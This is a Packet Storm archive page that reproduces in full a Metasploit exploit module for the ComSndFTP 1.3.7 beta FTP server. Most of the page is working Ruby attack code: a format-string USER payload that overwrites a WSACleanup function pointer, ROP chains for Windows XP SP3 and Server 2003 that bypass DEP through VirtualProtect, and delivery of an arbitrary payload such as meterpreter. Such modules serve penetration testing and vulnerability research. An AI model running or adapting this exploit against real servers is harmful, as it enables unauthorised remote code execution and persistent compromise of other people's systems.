what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ComSndFTP 1.3.7 Beta USER Format String (Write4)

ComSndFTP 1.3.7 Beta USER Format String (Write4)
Posted Jun 14, 2012
Authored by Rick, corelanc0d3r, mr_me, ChaoYi Huang | Site metasploit.com

This Metasploit module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially crafted format string specifier as a username. The crafted username is sent to to the server to overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. The SEH exit function is preferred so that the administrators are not left with an unhandled exception message. When using the meterpreter payload, the process will never die, allowing for continuous exploitation.

tags | exploit, arbitrary
SHA-256 | 8ca8af4598071a83d2552f14b027f3fdb8f361c95b01bacf03d39857c306caea

ComSndFTP 1.3.7 Beta USER Format String (Write4)

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# https://metasploit.com/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'ComSndFTP v1.3.7 Beta USER Buffer Overflow',
'Description' => %q{
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
crafted format string specifier as a username. The crafted username is sent to to the server to
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
The SEH exit function is preferred so that the administrators are not left with an unhandled
exception message. When using the meterpreter payload, the process will never die, allowing
for continuous exploitation.
},
'Author' =>
[
'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
'rick2600 <rick2600[at]corelan.be>', # msf module (target XP)
'mr_me <mr_me[at]@corelan.be>', # msf module (target 23k)
'corelanc0d3r <peter.ve[at]corelan.be>' # msf module
],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
# When a DoS is NOT a DoS
[ 'EDB', '19024']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
'DisableNops' => 'True'
},
'Targets' =>
[
[
'Windows XP SP3 - English',
{
'Functionpointer' => 0x71AC4050, # winsock pointer
'Functionaddress' => 0x71AB2636, # the repair address
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
'Pad' => 568
}
],
[
'Windows Server 2003 - English',
{
'Functionpointer' => 0x71C14044, # winsock pointer
'Functionaddress' => 0x71C02661, # the repair address
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
'Pad' => 568
}
]
],
'DisclosureDate' => 'Jun 08 2012'))

register_options(
[
Opt::RPORT(21),
], self.class)
end

def check
connect
banner = sock.get(-1,3)
validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
validate << "\xf1\xc6\xf7\x21\x0d\x0a"
disconnect

if (banner == validate)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end

def exploit

rop = ''
if target.name =~ /Server 2003/
# C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
rop = [
0x77be3adb, # pop eax ; retn
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
junk,
0x77bb0c86, # xchg eax,esi ; retn
0x77be3adb, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77BAD64D, # neg eax ; pop ebp ; retn
junk,
0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
0x77bbfc02, # pop ecx ; retn
0x77bef001, # ptr that is w+
0x77bd8c04, # pop edi ; retn
0x77bd8c05, # retn
0x77be3adb, # pop eax ; retn
0xFFFFFFC0, # flNewProtect
0x77BAD64D, # neg eax ; pop ebp ; retn
0x77be2265, # ptr to 'push esp ; ret'
0x77BB8285, # xchg eax,edx ; retn
0x77be3adb, # pop eax ; retn
0x90909090, # nops
0x77be6591, # pushad ; add al,0ef ; retn
].pack("V*")

elsif target.name =~ /XP SP3/
# C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
rop = [
0x77C21D16, # pop eax ; retn
0x77C11120, # <- *&VirtualProtect()
0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
junk,
0x77C21891, # pop esi ; retn
0x77C5D010, # ptr that is w+
0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
0x77C21D16, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77C1BE18, # neg eax ; pop ebp ; retn
junk,
0x77C2362C, # pop ebx ; retn
0x77C5D010, # ptr that is w+
0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
0x77C1F519, # pop ecx ; retn
0x77C5D010, # ptr that is w+
0x77C23B47, # pop edi ; retn
0x77C23B48, # retn
0x77C21D16, # pop eax ; retn
0xFFFFFFC0, # flNewProtect
0x77C1BE18, # neg eax ; pop ebp ; retn
0x77C35459, # ptr to 'push esp ; ret'
0x77C58FBC, # xchg eax,edx ; retn
0x77C21D16, # pop eax ; retn
0x90909090, # nops
0x77C567F0, # pushad ; add al,0ef ; retn
].pack("V*")
end

stage1 = %Q{
mov eax, #{target['Functionpointer']}
mov ecx, #{target['Functionaddress']}
mov [eax], ecx
}

offset_wp = rand_text_alphanumeric(1)
pivot = target['Pivot']
offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length

attackstring = rand_text_alphanumeric(7)
attackstring << [target['Functionpointer']].pack('V')
attackstring << "%#{pivot}x" # special pointer to our pivot
attackstring << "%p" * 208 + "#{offset_wp }%n" # format specifiers to read and write the function pointer
attackstring << rand_text_alphanumeric(target['Pad'])
attackstring << rop
attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
attackstring << payload.encoded
attackstring << rand_text_alphanumeric(2000 - offset)
attackstring << "\r\n"

sploit = "USER #{attackstring}\r\n"

print_status("Triggering overflow...")
connect
sock.get_once(1024)
sock.put(sploit)
select(nil, nil, nil, 2)
handler
disconnect

end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close